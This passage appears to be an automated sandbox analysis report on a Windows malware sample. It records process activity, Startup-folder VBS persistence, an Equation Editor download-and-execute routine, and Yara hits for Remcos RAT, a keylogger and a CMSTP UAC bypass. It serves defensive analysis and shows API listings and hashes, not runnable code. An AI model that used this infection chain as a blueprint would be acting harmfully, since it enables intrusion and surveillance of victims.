MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:29:05
Start date:	13/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\feapszuyi"
Imagebase:	0xf80000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:29:13
Start date:	13/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Imagebase:	0xff4b0000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:29:14
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0x1390000
File size:	1'290'752 bytes
MD5 hash:	6539C2C942C9AA3AB9C7FE14FCCF0B4E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:29:16
Start date:	13/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0xf80000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:29:26
Start date:	13/10/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	86.4%
Total number of Nodes:	59
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00683F21 Relevance: 6.1, APIs: 4, Instructions: 86
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(00683F13,?,00683EB0,?,00683E94), ref: 00683F21

Part of subcall function 00683F3B: URLDownloadToFileW.URLMON(00000000,00683F4C,?,00000000,00000000,?,00683EB0,?,00683E94), ref: 00683F9A
Part of subcall function 00683F3B: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,00683EB0,?,00683E94), ref: 00683FD8
Part of subcall function 00683F3B: ExitProcess.KERNEL32(00000000,?,00683FDF,?,00683EB0,?,00683E94), ref: 00683FF0

Memory Dump Source

Source File: 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Offset: 00672000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_672000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: e530546b424e5f50711433aae8c793ee66b546bdcb0a360c31e4adade75edf3e
Instruction ID: 398b9cb22e6455b81c097b53d1cd64d2e722097212ddd62362c22810af0f520d
Opcode Fuzzy Hash: e530546b424e5f50711433aae8c793ee66b546bdcb0a360c31e4adade75edf3e
Instruction Fuzzy Hash: 4E21809184D3D12FDB17A7304C2AB557F366F23B04F5946CEE2815E1E3E6984604C7A6

Function 00683EA3 Relevance: 4.6, APIs: 3, Instructions: 134
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,00683F4C,?,00000000,00000000,?,00683EB0,?,00683E94), ref: 00683F9A
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,00683EB0,?,00683E94), ref: 00683FD8
ExitProcess.KERNEL32(00000000,?,00683FDF,?,00683EB0,?,00683E94), ref: 00683FF0

Memory Dump Source

Source File: 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Offset: 00672000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_672000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: b8bab83f85b5c5402034e831ddace753cd49f026cdd886a57a845ccc68c44514
Instruction ID: a6297efe380bf0e179cfca0261b49c14b67002e5c09b3b7dd223bf870e6eda10
Opcode Fuzzy Hash: b8bab83f85b5c5402034e831ddace753cd49f026cdd886a57a845ccc68c44514
Instruction Fuzzy Hash: 6541C29180D3E12FDB12B7300D6A795BF326B23B00F0D87CEE6814A2A3D7949605C396

Function 00683F3B Relevance: 4.6, APIs: 3, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Offset: 00672000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_672000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 5e4135acb2102ea4294f449da0a60e12d42cce5aa87a17059efcac27c8d9921b
Instruction ID: 5e83766cc8c5deddd527b33dc8912f017b2dcb148decc8cc9e2ffc6d1f5d8c8c
Opcode Fuzzy Hash: 5e4135acb2102ea4294f449da0a60e12d42cce5aa87a17059efcac27c8d9921b
Instruction Fuzzy Hash: 93218E91C4D3D12EDB13A7304C2DB557F765F23B00F494ACEE2824E1E3E6A88500C756

Function 00683F98 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,00683F4C,?,00000000,00000000,?,00683EB0,?,00683E94), ref: 00683F9A

Part of subcall function 00683FB1: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,00683EB0,?,00683E94), ref: 00683FD8
Part of subcall function 00683FB1: ExitProcess.KERNEL32(00000000,?,00683FDF,?,00683EB0,?,00683E94), ref: 00683FF0

Memory Dump Source

Source File: 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Offset: 00672000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_672000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 835fec378c8b6af4fa6716d9166716a14f8447ee4cb87f5a2d549731e122a194
Instruction ID: f538568e77acc86d6a400448567696a05ab9615caad491a39b7d443e57015b8a
Opcode Fuzzy Hash: 835fec378c8b6af4fa6716d9166716a14f8447ee4cb87f5a2d549731e122a194
Instruction Fuzzy Hash: 06F0276094D36129EB22B7704C4AF6B2E369F91F40F540A89F3516E1D3DD9489048369

Function 00683FC6 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,00683EB0,?,00683E94), ref: 00683FD8

Part of subcall function 00683FEB: ExitProcess.KERNEL32(00000000,?,00683FDF,?,00683EB0,?,00683E94), ref: 00683FF0

Memory Dump Source

Source File: 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Offset: 00672000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_672000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: 7f7aa562a89924fabdf9aeb5c171c471158df2b6ed722311a484f1efe0b3ad58
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: A101495994831311DF3073648805BF76A23DB51740FC98B47ABE1292C9CD5498C3C31A

Function 00683FB1 Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Offset: 00672000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_672000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: b499cd61b6cf0e64b52e55d99f3ec1675bda66af4221bce052d45a5e9dea5f24
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: CF01492194C30320E770B3204C45BEBADA3DB91B44F90875AF3E059185CE444943C31D

Function 00683FEB Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,?,00683FDF,?,00683EB0,?,00683E94), ref: 00683FF0

Memory Dump Source

Source File: 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Offset: 00672000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_672000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Function 00683FF2 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.358867857.0000000000672000.00000004.00000020.00020000.00000000.sdmp, Offset: 00672000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_672000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 1bfec70fa9e1ddc98600c9ed0821a447dbafbd27f43539adcd0870e03578778c
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: ACD06C712125029BD245EF04D990A57F36AFBD8711B24D268E6044B61ADB30E892DB94

Analysis Process: taskhostw.exePID: 3540, Parent PID: 3384COMMON

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.9%
Total number of Nodes:	1803
Total number of Limit Nodes:	28

Executed Functions

Function 00CF3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CF3B7A
IsDebuggerPresent.KERNEL32 ref: 00CF3B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,00DB52F8,00DB52E0,?,?), ref: 00CF3BFD

Part of subcall function 00CF7D2C: _memmove.LIBCMT ref: 00CF7D66

Part of subcall function 00D00A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00CF3C26,00DB52F8,?,?,?), ref: 00D00ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00CF3C81
MessageBoxA.USER32 ref: 00D2D3EC
SetCurrentDirectoryW.KERNEL32(?,00DB52F8,?,?,?), ref: 00D2D424
GetForegroundWindow.USER32 ref: 00D2D4AA
ShellExecuteW.SHELL32(00000000,?,?), ref: 00D2D4B1

Part of subcall function 00CF3A58: GetSysColorBrush.USER32 ref: 00CF3A62
Part of subcall function 00CF3A58: LoadCursorW.USER32 ref: 00CF3A71
Part of subcall function 00CF3A58: LoadIconW.USER32 ref: 00CF3A88
Part of subcall function 00CF3A58: LoadIconW.USER32 ref: 00CF3A9A
Part of subcall function 00CF3A58: LoadIconW.USER32 ref: 00CF3AAC
Part of subcall function 00CF3A58: LoadImageW.USER32 ref: 00CF3AD2
Part of subcall function 00CF3A58: RegisterClassExW.USER32(?), ref: 00CF3B28

Part of subcall function 00CF39E7: CreateWindowExW.USER32 ref: 00CF3A15
Part of subcall function 00CF39E7: CreateWindowExW.USER32 ref: 00CF3A36
Part of subcall function 00CF39E7: ShowWindow.USER32(00000000), ref: 00CF3A4A
Part of subcall function 00CF39E7: ShowWindow.USER32(00000000), ref: 00CF3A53

Part of subcall function 00CF43DB: _memset.LIBCMT ref: 00CF4401
Part of subcall function 00CF43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00CF44A6

Strings

This is a third-party compiled AutoIt script., xrefs: 00D2D3E4
runas, xrefs: 00D2D4A5

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 64a74b4dae85271fb7f5db791c40225e4769a7b5bd8fadd65d84e39f9f19c438
Instruction ID: 278740e711135e3b774df3a1762b2affe7e769b9cb1f252ea0adfc8db55d9c58
Opcode Fuzzy Hash: 64a74b4dae85271fb7f5db791c40225e4769a7b5bd8fadd65d84e39f9f19c438
Instruction Fuzzy Hash: B951D13090938CFECF51EBB4EC05AFD7B75AF05300B004265F656E62A1DA704A46DB36

Function 00CF4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00CF4B2B

Part of subcall function 00CF7D2C: _memmove.LIBCMT ref: 00CF7D66

GetCurrentProcess.KERNEL32(?,00D7FAEC,00000000,00000000,?), ref: 00CF4BF8
IsWow64Process.KERNEL32(00000000), ref: 00CF4BFF
GetNativeSystemInfo.KERNEL32(00000000), ref: 00CF4C45
FreeLibrary.KERNEL32(00000000), ref: 00CF4C50
GetSystemInfo.KERNEL32(00000000), ref: 00CF4C81
GetSystemInfo.KERNEL32(00000000), ref: 00CF4C8D

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 77f0984a55c35dbe095141818b39ea45cd60e4a91d5e2b52af155d56b030378d
Instruction ID: c091da261c3ea06b730181b3a4c2ad8d977fc39aaef9660e62a1579d69c0396b
Opcode Fuzzy Hash: 77f0984a55c35dbe095141818b39ea45cd60e4a91d5e2b52af155d56b030378d
Instruction Fuzzy Hash: B991D73154ABC4DEC775CB6894611BBBFF5AF35310B484A9DD1CB83B42D220E948D72A

Function 00CF4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00CF4FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00CF4EEE,?,?,00000000,00000000), ref: 00CF5010
LoadResource.KERNEL32(?,00000000,?,?,00CF4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00CF4F8F), ref: 00D2DC90
SizeofResource.KERNEL32(?,00000000,?,?,00CF4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00CF4F8F), ref: 00D2DCA5
LockResource.KERNEL32(00CF4EEE,?,?,00CF4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00CF4F8F,00000000), ref: 00D2DCB8

Strings

SCRIPT, xrefs: 00CF5006

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 485fab6a98b3871a082e1bf4ef6b44f8adc283165e945abe162014fb17b3ab8b
Instruction ID: 181a42f1bdf178950e5165f8be2bb1fbbfc477f085ab817db7eff37e0737f190
Opcode Fuzzy Hash: 485fab6a98b3871a082e1bf4ef6b44f8adc283165e945abe162014fb17b3ab8b
Instruction Fuzzy Hash: 75115A75200704AFD7318B65DC48F677BB9EBC9B11F248168F61ACA260EB61EC408675

Function 00CFFE40 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: fc673aa290e925bf8fe492f5a9864f1b4ad5fab62b2f4e7758b71bb847daabf1
Instruction ID: b3b39670a34718946b79959f5707032e6254a4466cd654f6f450b719ab6f60aa
Opcode Fuzzy Hash: fc673aa290e925bf8fe492f5a9864f1b4ad5fab62b2f4e7758b71bb847daabf1
Instruction Fuzzy Hash: 339236746083419FD724DF14C480B6ABBE1FF89304F18896DE98A9B392D775EC45CBA2

Function 00D5449B Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00D2E6F1), ref: 00D544AB
FindFirstFileW.KERNEL32(?,?), ref: 00D544BC
FindClose.KERNEL32(00000000), ref: 00D544CC

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: a64a6b8c108869f7518598f4fe6873d5ac92058264a359554044ffd26d58d6e0
Instruction ID: 9f2fa192142cc5b5405b843f289f1fc7197f1c1478f19ed258f3e83916bbb607
Opcode Fuzzy Hash: a64a6b8c108869f7518598f4fe6873d5ac92058264a359554044ffd26d58d6e0
Instruction Fuzzy Hash: 5FE0D831814500574620A738EC0D5E9775CEE0533AF500725FD39C21D0F7B4999486B6

Function 00CFE800 Relevance: 3.6, Strings: 2, Instructions: 1102COMMON

Download Yara Rule

Strings

`t{, xrefs: 00CFE903, 00CFEA8A, 00CFEC10, 00CFECAB
Variable must be of type 'Object'., xrefs: 00D341BB

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.$`t{
API String ID: 0-155790300
Opcode ID: 77cc4e3e21e3b253b1495c219f52ac6c857b5398dafb2e4a5942c76d45895fca
Instruction ID: 6a1ea47398a67a9f2ea2a3876303b1776aa09f85650aafdbe4cfb3f1c898d838
Opcode Fuzzy Hash: 77cc4e3e21e3b253b1495c219f52ac6c857b5398dafb2e4a5942c76d45895fca
Instruction Fuzzy Hash: A2A29375A00209CFCB54CF58C480ABEB7B1FF58310F648169EA16AB361D775ED46CBA2

Function 00D00B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D00BBB
timeGetTime.WINMM ref: 00D00E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D00FB3
Sleep.KERNEL32(0000000A), ref: 00D00FC1
LockWindowUpdate.USER32(00000000), ref: 00D0105A
DestroyWindow.USER32 ref: 00D01066
GetMessageW.USER32 ref: 00D01080
Sleep.KERNEL32(0000000A,?,?), ref: 00D351DC
TranslateMessage.USER32(?), ref: 00D35FB9
DispatchMessageW.USER32(?), ref: 00D35FC7
GetMessageW.USER32 ref: 00D35FDB

Strings

@COM_EVENTOBJ, xrefs: 00D35849
@GUI_CTRLID, xrefs: 00D35293
@GUI_WINHANDLE, xrefs: 00D352E8
@TRAY_ID, xrefs: 00D35AE8
@GUI_CTRLHANDLE, xrefs: 00D3533D

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 854dad462818a3da956731ad35311028ce005b40b53aacde949c7fc6f5cc22fb
Instruction ID: 8156ff4cde142aac9a8db15a920ac8b780eb535947780311711fc0861bc8c738
Opcode Fuzzy Hash: 854dad462818a3da956731ad35311028ce005b40b53aacde949c7fc6f5cc22fb
Instruction Fuzzy Hash: 9EB2CF70608741DFD728DF24D884BAABBE5FF84304F18491DF58A97291DB71E884DBA2

Function 00D591FE Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D59008: __time64.LIBCMT ref: 00D59012

Part of subcall function 00CF5045: _fseek.LIBCMT ref: 00CF505D

__wsplitpath.LIBCMT ref: 00D592DD

Part of subcall function 00D1426E: __wsplitpath_helper.LIBCMT ref: 00D142AE

_wcscpy.LIBCMT ref: 00D592F0
_wcscat.LIBCMT ref: 00D59303
__wsplitpath.LIBCMT ref: 00D59328
_wcscat.LIBCMT ref: 00D5933E
_wcscat.LIBCMT ref: 00D59351

Part of subcall function 00D5904E: _memmove.LIBCMT ref: 00D59087
Part of subcall function 00D5904E: _memmove.LIBCMT ref: 00D59096

_wcscmp.LIBCMT ref: 00D59298

Part of subcall function 00D597DD: _wcscmp.LIBCMT ref: 00D598CD
Part of subcall function 00D597DD: _wcscmp.LIBCMT ref: 00D598E0

